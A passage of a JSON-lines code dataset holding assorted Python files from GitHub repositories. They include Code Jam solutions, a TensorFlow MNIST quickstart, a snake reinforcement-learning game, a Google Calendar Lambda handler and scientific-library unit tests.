2, maximum.num),\n ConsecStalls((maxlength - 1) // 2 + 1, maximum.num)]\n\n return new_elements\n\n def push_stalls_to_heap(self, new_elements):\n for element in new_elements:\n self.single_safe_push(element)\n\n def single_safe_push(self, element):\n heap_element = element.create_heap_element()\n heapq.heappush(self.heap, heap_element)\n\n def last_placement_found(self):\n maxlen = self.final_broken_block.length\n #print('Optimum: ', maxlen)\n\n minLs = (maxlen - 1)// 2\n if (maxlen - 1) % 2 != 0:\n maxLs = minLs + 1\n else:\n maxLs = minLs\n\n self.minLs = minLs\n self.maxLs = maxLs\n\n def print_optimum(self):\n print_case(self.name, self.maxLs, self.minLs)\n\ndef print_case(name, maxLs, minLs):\n string = 'Case #' + str(name) + ': ' + str(maxLs) + ' ' + str(minLs)\n print(string)\n\ndef main():\n testcases = int(input())\n for i in range(testcases):\n intstr = input().strip().split()\n N, K = [int(x) for x in intstr]\n if N == K:\n print_case(i + 1, 0, 0)\n else:\n instance = Instance(i + 1, N, K)\n instance.solve()\n instance.print_optimum()\n\nif __name__ == '__main__':\n 
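# Entry point: reads the number of test cases, then one N K pair per case.\n    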
main()\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/760.py","file_name":"760.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29632218383","text":"from datetime import datetime\nimport logging\n\nfrom celery import Celery\nimport pandas as pd\n\nfrom tadawol.strategies.macd import MACD\nfrom tadawol.strategies.base_strategy import BaseStrategy\nfrom tadawol.strategies.reverse import Reverse\nfrom tadawol.history import get_top_tickers, get_fresh_data\nfrom tadawol.services import email\nfrom tadawol.config import BrokerConfig\n\n\napp = Celery(\"tasks\", broker=BrokerConfig().url)\n\nlogger = logging.getLogger(__name__)\n\n\ndef _send_entry_and_exit(entry_df: pd.DataFrame, exit_df: pd.DataFrame, strategy: BaseStrategy):\n\n exit_columns = [\"Date\", \"Ticker\", \"Close\", \"week_previous_entries\", \"exit_reason\"]\n\n html = \"\"\"\\\n \n \n \n
<h2>Entries</h2>\n        {0}\n        <h2>Exits</h2>
\n {1}\n \n \n \"\"\".format(entry_df.to_html(), exit_df[exit_columns].to_html())\n subject = f\"{strategy.name} on {datetime.today().date()}\"\n email.send_email(html, subject)\n\n\n@app.task\ndef execute_macd_reverse_strategies(\n min_top_ticker: int,\n max_top_ticker: int\n):\n strategies = [MACD(), Reverse()]\n tickers = get_top_tickers(min_top_ticker, max_top_ticker)\n df = get_fresh_data(tickers)\n for strategy in strategies:\n try:\n today_trades, today_exits = strategy.get_today_trades_and_exits(df.copy(deep=True))\n logger.info(\"****************** RESULTS **********************\")\n logger.info(\"****************** ENTRIES **********************\")\n logger.info(today_trades)\n logger.info(\"****************** EXITS *************************\")\n logger.info(today_trades)\n #_send_entry_and_exit(today_trades, today_exits, strategy)\n except KeyboardInterrupt as k_e:\n raise KeyboardInterrupt from k_e\n","repo_name":"yassineameur/tadawol","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32750431479","text":"\"\"\"\nTensorflow 2 quickstart\n\"\"\"\n# Setup the TensorFlow\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Load the MNIST dataset\nmnist = tf.keras.datasets.mnist\n\n(x_train, y_train) = (x_test, y_test) = mnist.load_data()\nx_train, x_test = x_train / 255.0, x_test / 255.0\n\n# Build a machine learning model\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Dense(128, activation='relu', input_shape=(28 * 28,)),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10)])\n\n# Print logits\npredictions = model(x_train[:1]).numpy()\nprint(predictions)\n\n# Print probabilities\nprint(tf.nn.softmax(predictions).numpy())\n\n# Define a loss function\nloss_fn = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)\nprint(loss_fn(y_train[:1], predictions).numpy())\n\nmodel.compile(optimizer='adam',\n loss=loss_fn,\n metrics=['accuracy'])\n\nprint(model.summary())\n\n# Train and evaluate the model\nmodel.fit(x_train, y_train, epochs=5)\n\nprint(model.evaluate(x_test, y_test, verbose=2))\n\n# Attach the softmax to the trained model to return probability\nprobability_model = tf.keras.Sequential([\n model,\n tf.keras.layers.Softmax()])\n\nprint(probability_model(x_test[:5]))\n","repo_name":"mts0629/tensorflow-tutorial","sub_path":"ml_basics_with_keras/quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23646398231","text":"import threading\ntimer = None\nthread_dict = {}\n\ninp = open('C-large.in', 'r')\nout = open('C-large.out', 'w')\ntest = int(inp.readline())\n\ndef no_of_recycle_pairs(digits, num, limit):\n res, cur = 0, {}\n for i in range(digits - 1):\n rem = num % (10 ** (i + 1))\n temp = num / (10 ** (i + 1))\n new = rem * (10 ** (digits - i - 1)) + temp\n if new not in cur:\n res += (num < new and new <= limit) and 1 or 0\n cur[new] = 0\n return res\n\ndef calculate(index, digits, A, span, B):\n global thread_dict\n res = 0\n if digits == 1:\n return res\n for num in range(A, span + 1):\n res += no_of_recycle_pairs(digits, num, B)\n thread_dict[index][1] = res\n return\n \n\nfor i in range(1, test+1):\n data = inp.readline().split(' ')\n data[-1] = data[-1][-1] == '\\n' and data[-1][:-1] or data[-1]\n data = [int(num) for num in data]\n 
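# Unpack the range [A, B] and fan the pair counting out over worker threads.\n    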
A, B = data[0], data[1]\n no_of_thread, cur = (B - A) <= 100 and 1 or 10, A\n test, digit = B, 0\n written = False\n while test:\n digit += 1\n test /= 10\n thread_dict.clear()\n for j in range(no_of_thread):\n thread_dict[j] = [threading.Thread(target = calculate, args = (j, digit, cur, cur + (B - A) / no_of_thread, B)), 0]\n cur += (B - A) / no_of_thread + 1\n for thread in thread_dict:\n thread_dict[thread][0].start()\n def check():\n global timer, thread_dict, written\n flag = False\n for thread in thread_dict:\n if thread_dict[thread][0].isAlive():\n flag = True\n break\n if flag:\n timer = threading.Timer(1.0, check)\n timer.start()\n return\n res = 0\n for thread in thread_dict:\n res += thread_dict[thread][1]\n out.write(\"Case #%d: %s\\n\" %(i, res))\n written = True\n return\n \n timer = threading.Timer(1.0, check)\n timer.start()\n while not written:\n pass\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_97/707.py","file_name":"707.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27957690826","text":"from PIL import ImageGrab\r\nimport cv2\r\nimport numpy as np\r\n\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\nout = cv2.VideoWriter('enigma.mp4',fourcc,60,(1920,1080),True)\r\nwhile True:\r\n img = np.array(ImageGrab.grab())\r\n out.write(img)\r\n## cv2.imshow('window',img)\r\n if cv2.waitKey(25) & 0xFF == ord('q'):\r\n cv2.destoryAllWindows()\r\n break\r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"liwenhan220/Enigma","sub_path":"videowriter.py","file_name":"videowriter.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35015250142","text":"import keras\nfrom PIL import Image\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Activation\nfrom keras.layers import MaxPooling2D, Convolution2D\n\nimport numpy as np\nfrom keras.utils import np_utils\n\nfrom numpy import array\nfrom numpy import size\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nimport os\n\n\n\"%matplotlib inline\"\n\npath1 = 'D:\\Coding\\OpenCV\\Sudoku\\All'\npath2 = 'D:\\Coding\\OpenCV\\Sudoku\\All_Proc'\n\nimg_rows= img_cols = 128\n\nlisting = os.listdir(path1)\nnum_samples = size(listing)\nprint(num_samples)\n\n# for file in listing:\n# Image.open(path1 + \"\\\\\" + file)\n\nimage1 = (Image.open(path1 + \"\\\\\" + listing[0]))\nimage2 = array(Image.open(path1 + \"\\\\\" + listing[0])).flatten()\n\nimgmatrix = array([array(Image.open(path1 + '\\\\' + img)).flatten()for img in listing],\"f\")\n\nlabel = np.zeros((num_samples,),dtype=int)\nlabel.shape\n\nlistingnd = np.array(listing)\n\nlabel[0:1016] = 0\nlabel[1016:2032] = 1\nlabel[2032:3048] = 2\nlabel[3048:4064] = 3\nlabel[4064:5080] = 4\nlabel[5080:6096] = 5\nlabel[6096:7112] = 6\nlabel[7112:8128] = 7\nlabel[8128:9144] = 8\nlabel[9144:10160] = 9\n\ndata,Label = shuffle(imgmatrix,label,random_state = 2)\ntemp = [data,Label]\n\nprint(temp[0].shape)\nprint(temp[1].shape)\n\n#batch_size to train\nbatch_size = 256\n# number of output classes\nnb_classes = 10\n# number of epochs to train\nnb_epoch = 1\n\n\n# number of convolutional filters to use\nnb_filters = 32\n# size of pooling area for max pooling\nnb_pool = 2\n# convolution kernel size\nnb_conv = 3\n\nX = temp[0]\ny = temp[1]\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, 
test_size=0.15, random_state=4)\nX_train.shape\ny_test.shape\n\n\nX_train = X_train.reshape(X_train.shape[0], img_rows, img_cols,1)\nX_test = X_test.reshape(X_test.shape[0], img_rows, img_cols,1)\n\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\n\nX_train /= 255\nX_test /= 255\n\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\nY_train = np_utils.to_categorical(y_train, nb_classes)\nY_test = np_utils.to_categorical(y_test, nb_classes)\n\nmodel = Sequential()\n\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv,border_mode='valid',input_shape=(img_rows, img_cols,1)))\nconvout1 = Activation('relu')\nmodel.add(convout1)\nmodel.add(Convolution2D(nb_filters, nb_conv, nb_conv))\nconvout2 = Activation('relu')\nmodel.add(convout2)\nmodel.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\nmodel.add(Dropout(0.5))\n\nmodel.add(Flatten())\nmodel.add(Dense(128))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes))\nmodel.add(Activation('softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='adadelta',metrics=['accuracy'])\n\nhist = model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, verbose=1, validation_data=(X_test, Y_test))\n\nfrom keras.models import load_model\nmodel.save(\"My_model.h5\")\n","repo_name":"pathak-aman/AR_Sudoku_Solver","sub_path":"CNN-Chars74k.py","file_name":"CNN-Chars74k.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36863021773","text":"import datetime\nfrom dateutil.parser import parse\nimport json\n\nfrom googleapiclient.discovery import build\nfrom httplib2 import Http\nfrom oauth2client.service_account import ServiceAccountCredentials\n\nCALENDAR_ID = 'bleh@group.calendar.google.com'\n\ndef create_event_from_message(message):\n\n start_datetime = parse(message['pass_begin'])\n end_datetime = parse(message['pass_end'])\n\n event = {\n 'summary': message['satellite']['name'],\n 'location': 'Des Moines, IA',\n 'description': message['satellite']['frequency'],\n 'start': {\n 'dateTime': start_datetime.isoformat(),\n 'timeZone': 'Etc/UTC'\n },\n 'end': {\n 'dateTime': end_datetime.isoformat(),\n 'timeZone': 'Etc/UTC'\n }\n }\n\n return event\n\ndef post_to_google_calendars(event_body):\n scopes = ['https://www.googleapis.com/auth/calendar']\n credentials = ServiceAccountCredentials.from_json_keyfile_name(\n './SatStalkerPredictor.json',\n scopes\n )\n\n http_auth = credentials.authorize(Http())\n\n service = build('calendar', 'v3', http=http_auth)\n\n service.events().insert(\n calendarId=CALENDAR_ID,\n body=event_body\n ).execute()\n\ndef lambda_handler(event, context):\n for record in event['Records']:\n parsed_record = json.loads(record['Sns']['Message'])\n\n new_event = create_event_from_message(parsed_record)\n\n post_to_google_calendars(new_event)\n\ndef main():\n lambda_handler(None, None)\n\nif __name__ == '__main__':\n main()\n","repo_name":"n8dgr8/minister_of_calendars","sub_path":"minister_of_calendars.py","file_name":"minister_of_calendars.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23595048821","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\nimport sys\n\nmagic=\"welcome to code jam\"\nmod=10000\n\ndef noccur(s):\n\t'''Find the number of occurrences of magic as a subsequence of 
s'''\n\tdp=(len(magic)+1)*[0]\n\tdp[0]=1\n\tfor c in s:\n\t\tfor i in range(1, 1+len(magic)):\n\t\t\tif c==magic[i-1]:\n\t\t\t\tdp[i]+=dp[i-1]\n\t\t\t\tdp[i]%=mod\n\treturn dp[len(magic)]\n\nprint(\"\\n\".join([\"Case #{0}: {1:0>4}\".format(i+1,noccur(s.strip())) for (i,s) in enumerate(sys.stdin.readlines()[1:]) if not s.isspace() ]))\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_36/375.py","file_name":"375.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18554567175","text":"import os\nimport time\nimport pygame\nimport numpy as np\nfrom random import randint\nimport random\n\nimport torch\n\nfrom game import Game\nfrom render import Render\nfrom config import Options\nfrom agent import Agent\nfrom menu import Menu\n\n\nclass Run:\n def __init__(self, options):\n self.render = Render()\n self.agent = Agent(options)\n self.agent = self.agent\n self.model = self.agent.model\n self.counter_games = 0\n self.record = 0\n self.total_score = 0\n self.score_plot = []\n self.counter_plot = []\n self.start_clock = time.time()\n\n def play(self, training):\n pygame.init()\n\n while self.counter_games < options.num_games:\n game = Game(options.game_width, options.game_height)\n snake = game.snake\n apple = game.apple\n\n # Perform first move\n game.init_game(snake, game, apple, self.agent, options.batch_size)\n\n steps = 0 # steps in the game\n while (not game.crash) and (steps < 100):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n quit()\n\n if training:\n # agent.epsilon is set to decay by each step, create less random moves over time\n self.agent.epsilon = 1 - (self.counter_games * 0.01)\n else:\n self.agent.epsilon = 0.01\n\n # get old state\n state_old = self.agent.get_state(game, snake, apple)\n\n # Random action or action from neural network\n if random.uniform(0, 1) < self.agent.epsilon:\n final_move = np.eye(3)[randint(0, 2)]\n else:\n # Predict action based on the old state\n with torch.no_grad():\n state_old_tensor = torch.tensor(\n state_old.reshape((1, 11)), dtype=torch.float32\n )\n prediction = self.agent.prediction(state_old_tensor)\n final_move = np.eye(3)[\n np.argmax(prediction.detach().cpu().numpy()[0])\n ]\n\n # Perform new move and get new state\n snake.play_step(\n final_move,\n snake.x,\n snake.y,\n game,\n apple,\n self.agent,\n )\n # Set reward for the new state\n reward = self.agent.set_reward(snake, game.crash)\n\n # If food is eaten, steps is set to 0\n if reward > 0:\n steps = 0\n\n if training:\n state_new = self.agent.get_state(game, snake, apple)\n self.agent.train_short_memory(\n state_old, final_move, reward, state_new, game.crash\n )\n # Store the new data into a long term memory\n self.agent.remember(\n state_old, final_move, reward, state_new, game.crash\n )\n else:\n record = game.get_record(game.score, self.record)\n self.render.display(snake, apple, game, record)\n pygame.time.wait(options.delay)\n\n steps += 1\n\n self.counter_games += 1\n self.total_score += game.score\n print(f\"Game {self.counter_games} Score: {game.score}\")\n\n if training:\n self.agent.train_long_memory(self.agent.memory, options.batch_size)\n self.score_plot.append(game.score)\n self.counter_plot.append(self.counter_games)\n\n if training:\n stop_clock = time.time()\n model_weights = self.model.state_dict()\n 
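# Save the trained weights (creating the directory if needed) and plot the per-game score history.\n            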
if not os.path.exists(options.weights_path):\n os.makedirs(options.weights_path)\n torch.save(model_weights, options.weights_path)\n options.plot(\n self.counter_plot, self.score_plot, self.start_clock, stop_clock\n )\n return self.total_score\n\n\nif __name__ == \"__main__\":\n pygame.font.init()\n options = Options()\n run = Run(options)\n agent = Agent(options)\n\n agent.model = agent.model_selection(options)\n\n menu = Menu(options, options.game_width, options.game_height + 60)\n init = menu.intro(run.play, agent.model)\n","repo_name":"Gako358/snake","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5580952727","text":"# -*- coding: utf-8 -*-\n\"\"\"Test general pilot-based correlation synchronization\"\"\"\n\nfrom unittest import TestCase\nfrom unittest.mock import Mock\n\nimport numpy as np\n\nfrom hermespy.core import Signal\nfrom hermespy.modem.waveform_correlation_synchronization import CorrelationSynchronization\nfrom unit_tests.core.test_factory import test_yaml_roundtrip_serialization\n\n__author__ = \"Jan Adler\"\n__copyright__ = \"Copyright 2023, Barkhausen Institut gGmbH\"\n__credits__ = [\"Jan Adler\"]\n__license__ = \"AGPLv3\"\n__version__ = \"1.1.0\"\n__maintainer__ = \"Jan Adler\"\n__email__ = \"jan.adler@barkhauseninstitut.org\"\n__status__ = \"Prototype\"\n\n\nclass TestCorellationSynchronization(TestCase):\n \"\"\"Correlation synchronization class testing\"\"\"\n\n def setUp(self) -> None:\n\n self.threshold = .91\n self.guard_ratio = .81\n self.synchronization = CorrelationSynchronization(threshold=self.threshold, guard_ratio=self.guard_ratio)\n \n def test_init(self) -> None:\n \"\"\"Initialization parameters should be properly stored as class attributes\"\"\"\n\n self.assertEqual(self.threshold, self.synchronization.threshold)\n self.assertEqual(self.guard_ratio, self.synchronization.guard_ratio)\n\n def test_threshold_setget(self) -> None:\n \"\"\"Threshold property getter should return setter argument\"\"\"\n\n expected_threshold = .1\n self.synchronization.threshold = expected_threshold\n\n self.assertEqual(expected_threshold, self.synchronization.threshold)\n\n def test_threshold_validation(self) -> None:\n \"\"\"Threshold property should raise ValueError on invalid arguments\"\"\"\n\n with self.assertRaises(ValueError):\n self.synchronization.threshold = -.1\n\n with self.assertRaises(ValueError):\n self.synchronization.threshold = 1.1\n\n def test_guard_ratio_setget(self) -> None:\n \"\"\"Guard ratio property getter should return setter argument\"\"\"\n\n expected_guard_ratio = .1\n self.synchronization.guard_ratio = expected_guard_ratio\n\n self.assertEqual(expected_guard_ratio, self.synchronization.guard_ratio)\n\n def test_guard_ratio_validation(self) -> None:\n \"\"\"Guard ratio property should raise ValueError on invalid arguments\"\"\"\n\n with self.assertRaises(ValueError):\n self.synchronization.guard_ratio = -.1\n\n with self.assertRaises(ValueError):\n self.synchronization.guard_ratio = 1.1\n\n def test_synchronize(self) -> None:\n \"\"\"Synchronization should properly order pilot sections into frames\"\"\"\n\n pilot_sequence = Signal(np.ones(20, dtype=complex), 1.)\n\n waveform_generator = Mock()\n waveform_generator.pilot_signal = pilot_sequence\n waveform_generator.samples_in_frame = 20\n self.synchronization.waveform_generator = waveform_generator\n\n shifted_sequence = np.append(np.zeros((1, 10), 
dtype=complex), pilot_sequence.samples, axis=1)\n\n pilot_indices = self.synchronization.synchronize(shifted_sequence)\n self.assertSequenceEqual([10], pilot_indices)\n \n def test_default_synchronize(self) -> None:\n \"\"\"Synchronization should properly order pilot sections into frames\"\"\"\n \n pilot_sequence = Signal(np.ones(20, dtype=complex), 1.)\n\n waveform_generator = Mock()\n waveform_generator.pilot_signal = pilot_sequence\n waveform_generator.samples_in_frame = 20\n self.synchronization.waveform_generator = waveform_generator\n\n empty_sequence = np.zeros((1, 40), dtype=complex)\n\n pilot_indices = self.synchronization.synchronize(empty_sequence)\n self.assertSequenceEqual([], pilot_indices)\n \n def test_serialization(self) -> None:\n \"\"\"Test YAML serialization\"\"\"\n \n test_yaml_roundtrip_serialization(self, self.synchronization)\n","repo_name":"Barkhausen-Institut/hermespy","sub_path":"tests/unit_tests/modem/test_waveform_correlation_synchronization.py","file_name":"test_waveform_correlation_synchronization.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"} +{"seq_id":"75066170755","text":"from termcolor import colored\r\n# VERIFICATION FUNCTIONS: Used To help the validity of the task at hand. \r\n\r\n# returns 0,1, and -1 if it is an invalid input. Checks if the input is either a \"no\" or \"yes\"\r\ndef GetCondition(prompt):\r\n if prompt == \"yes\" or prompt == \"YES\" or prompt == \"Yes\" or prompt == \"Y\" or prompt == \"y\":\r\n return 1\r\n if prompt == \"no\" or prompt == \"NO\" or prompt == \"No\" or prompt == \"N\" or prompt == \"n\":\r\n return 0\r\n return -1\r\n\r\n# checks if the string can be in numeral form.\r\ndef ValidInt(analyzed_str):\r\n if analyzed_str.isnumeric():\r\n return True\r\n else:\r\n return False\r\n\r\n# checks if the node parameter is inside the DFA.\r\ndef NodeInDFA(node, dfa):\r\n for i in dfa.keys:\r\n if node == i:\r\n return True\r\n return False\r\n\r\n# Prints out the status of the node and its connecting edges.\r\ndef PrintOutNodesAndEdges(dfa):\r\n for node in dfa.keys:\r\n edges = dfa.node_dictionary[node]\r\n edge0 = str(edges[0])\r\n edge1 = str(edges[1])\r\n if edge0 == \"-1\":\r\n edge0 = \"??\"\r\n if edge1 == \"-1\":\r\n edge1 = \"??\"\r\n\r\n print(colored(\"[ Node \" + str(node) + \": \" + \"edge 0\" + \"--> \" + \"Node \" + edge0 + \" || \" + \"edge 1\" + \"--> \" + \"Node \" + edge1 + \" ]\", \"magenta\"))\r\n\r\n# DFA BUILDER FUNCTIONS: Functions that collect the information to create a working DFA. \r\n\r\ndef EstablishNumberOfNodes(dfa):\r\n valid_input = False\r\n while valid_input == False:\r\n num_of_nodes = input('Please enter number of nodes: ')\r\n if num_of_nodes.isnumeric() == True:\r\n dfa.number_of_nodes = num_of_nodes\r\n valid_input = True \r\n else:\r\n print(colored(\"Not a Valid Number. Please Try Again.\", 'red'))\r\n\r\ndef EstablishStartState(list_of_nodes, dfa):\r\n valid_input = False\r\n while valid_input == False:\r\n start_node = input(\"Out of the nodes \" + str(list_of_nodes) + \", pick the starting node: \")\r\n if ValidInt(start_node) == True:\r\n for node in list_of_nodes:\r\n if node == int(start_node):\r\n dfa.q0 = int(start_node)\r\n valid_input = True\r\n break\r\n if valid_input == False:\r\n print(colored(\"Invalid start node. 
Please pick from the list.\", 'red'))\r\n\r\ndef EstablishFinalStates(dfa):\r\n for node in dfa.keys:\r\n valid_input = False\r\n while valid_input == False:\r\n final_state = input(\"Is node \" + str(node) + \" a final state? [Y/n] \")\r\n value = GetCondition(final_state)\r\n if value == 1:\r\n dfa.final_states.append(True)\r\n valid_input = True;\r\n elif value == 0:\r\n dfa.final_states.append(False)\r\n valid_input = True;\r\n else:\r\n print(colored(\"Invalid Input: Please try again.\", \"red\"))\r\n\r\ndef ConnectEdgesToNodes(dfa):\r\n avail_nodes = dfa.keys\r\n for node in avail_nodes: \r\n for edge in range(2):\r\n valid_input = False\r\n while valid_input == False:\r\n PrintOutNodesAndEdges(dfa)\r\n print(\"Choose out of the available nodes: \", avail_nodes)\r\n proposed_node = input(\"What node does edge \" + str(edge) + \" of node \" + str(node) + \" go to? \")\r\n if ValidInt(proposed_node) and NodeInDFA(int(proposed_node), dfa):\r\n dfa.node_dictionary[node][edge] = int(proposed_node)\r\n valid_input = True\r\n else:\r\n print(colored(\"Invalid Input. Please try again\", 'red'))\r\n\r\n # LANGUAGE VALIDITY FUNCTIONS: After DFA is created these functions check the validity of the language.\r\n\r\ndef ValidString(language):\r\n for c in language:\r\n if c != \"1\" and c != \"0\":\r\n return False\r\n return True\r\n\r\ndef NodeIsInFinalState(node, dfa):\r\n return dfa.final_states[node]\r\n","repo_name":"CeeBeeCodes/LMU-Graduate-Program","sub_path":"DFA/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"264248298","text":"import numpy as np\nimport pandas as pd\n\ndef masked_stats_to_dataframe(data,msklist,list_counts = 'G_mag_L2_PIXEL_COUNT',mean_type='m1'):\n masked_means = {}\n\n for metric in msklist:\n df = data[metric].copy()\n df = df.apply(lambda x: pd.Series(x))\n #df.columns = thresholds_list\n #masked_means[metric] = np.round(df.mean().tolist(),2)\n if mean_type =='m1':\n\n if metric == 'thresholds':#\n print(metric)\n masked_means[metric] = data[metric].apply(lambda x: pd.Series(x)).mean()\n #masked_means[metric] =#continue here\n else:\n masked_means[metric] = np.round(np.divide(df.sum(), data[list_counts].apply(lambda x: pd.Series(x)).sum()).tolist(), 2)#new\n elif mean_type =='m2':\n masked_means[metric] = np.round(\\\n np.sqrt(np.divide(df.sum(), data[list_counts].apply(lambda x: pd.Series(x)).sum()).tolist()), 2)\n masked_means['thresholds'] = data['thresholds'].iloc[0][:-1]\n masked_means['px_count'] = data[list_counts].apply(lambda x: pd.Series(x)).sum()\n out = pd.DataFrame(masked_means).T\n out.columns = data['thresholds'].iloc[0][:-1]\n return out\n\n","repo_name":"stsavian/equivariant_of_estimation","sub_path":"benchmark_networks/dataframe_operations/cell_list_to_single_cell.py","file_name":"cell_list_to_single_cell.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4255568144","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\nimport os.path as osp\n\nimport numpy as np\nimport pytest\n\nfrom sisl.io.siesta.fa import *\n\npytestmark = [pytest.mark.io, pytest.mark.siesta]\n_dir = osp.join(\"sisl\", \"io\", \"siesta\")\n\n\ndef test_si_pdos_kgrid_fa(sisl_files):\n f = sisl_files(_dir, \"si_pdos_kgrid.FA\")\n fa = faSileSiesta(f).read_data()\n\n assert len(fa) == 2\n fa1 = faSileSiesta(f).read_force()\n assert np.allclose(fa, fa1)\n\n\ndef test_read_write_fa(sisl_tmp):\n f = sisl_tmp(\"test.FA\", _dir)\n\n fa = np.random.rand(10, 3)\n faSileSiesta(f, \"w\").write_force(fa)\n fa2 = faSileSiesta(f).read_force()\n\n assert len(fa) == len(fa2)\n assert np.allclose(fa, fa2)\n","repo_name":"zerothi/sisl","sub_path":"src/sisl/io/siesta/tests/test_fa.py","file_name":"test_fa.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"35580217392","text":"# ------------------------------------------------------------------------\r\n# Escreva a função n_primos que recebe um número inteiro maior ou igual\r\n# a 2 como parâmetro e devolve a quantidade de números primos que existem\r\n# entre 2 e n (incluindo 2 e, se for o caso, n).\r\n# ------------------------------------------------------------------------\r\n\r\ndef ehPrimo(n):\r\n if (n == 2):\r\n return True\r\n elif (n % 2 == 0):\r\n return False\r\n else:\r\n i = 3\r\n while (i <= (n / i)):\r\n if ((n % i) == 0):\r\n return False\r\n i += 2\r\n return True\r\n\r\n return False\r\n\r\n\r\ndef n_primos(n):\r\n if (n < 2):\r\n return 0\r\n elif (n == 2):\r\n return 1\r\n else:\r\n contador = 1\r\n while (n > 2):\r\n if (ehPrimo(n)):\r\n contador += 1\r\n n -= 1\r\n return contador\r\n\r\n return 0\r\n\r\n\r\n# funcao para retornar o maior numero primo\r\ndef maior_primo(n):\r\n if (n < 2):\r\n return 0\r\n elif (n == 2):\r\n return 2\r\n else:\r\n\r\n while (n > 2):\r\n if (ehPrimo(n)):\r\n return n\r\n n -= 1\r\n return n\r\n\r\n return 0","repo_name":"Arduinobymyself/COURSERA","sub_path":"n_primos.py","file_name":"n_primos.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2986818884","text":"#!/usr/bin/env python3\nimport argparse\nimport sqlite3\nimport hashlib\nimport os\nimport re\nimport simba\nimport configparser\nfrom glob import *\nfrom os.path import *\nimport importlib.util\nimport pathlib\n\n#For deploy mode\n#from . import util\n#from . 
import simba\n#For local mode\nfrom simba import util\nfrom simba import database\n#simbaPath = util.getSimbaDir(pathlib.Path.cwd())\n\ndef add(simbaPath, config, scripts, mode='add', __directories=None, databasename=None, remove=None, specifictable=None, updateall=False,verbose=True,locations=None):\n retlist = []\n\n # Preserve the original current working directory, since we may be\n # be moving around a bit.\n workingDirectory = pathlib.Path.cwd().resolve()\n\n from glob import glob\n from os.path import basename\n tables = []\n if (simbaPath/\"data.ini\").is_file():\n config = configparser.ConfigParser()\n config.read(simbaPath/\"data.ini\")\n for sec in config.sections():\n if len(sec.split(' ')) == 1:\n # option 1: name only\n if '-' in sec:\n raise Exception(\"Table name \"+sec+\" contains a hyphen; hyphens are not allowed.\")\n names = [sec]\n elif \"for\" in sec.split(' '):\n # option 2: execute python query\n os.chdir(str(simbaPath)+'/../')\n exeret = dict()\n exec(\"from glob import glob; from os.path import basename; names = [\" + sec + \"]\",exeret)\n names = exeret['names']\n else:\n # option 3: treat as list of names\n names = sec.split(' ')\n \n match = config[sec]['match']\n \n for name in names:\n if config.has_option(sec,'name'): tablename = config[sec]['name'].replace(\"$NAME\",name)\n else: tablename = name\n \n \n table = {\"name\":tablename, \"match\":match.replace(\"$NAME\",name)}\n tables.append(table)\n \n else:\n print(\"No data.ini file found\")\n \n \n if not databasename: databasename = 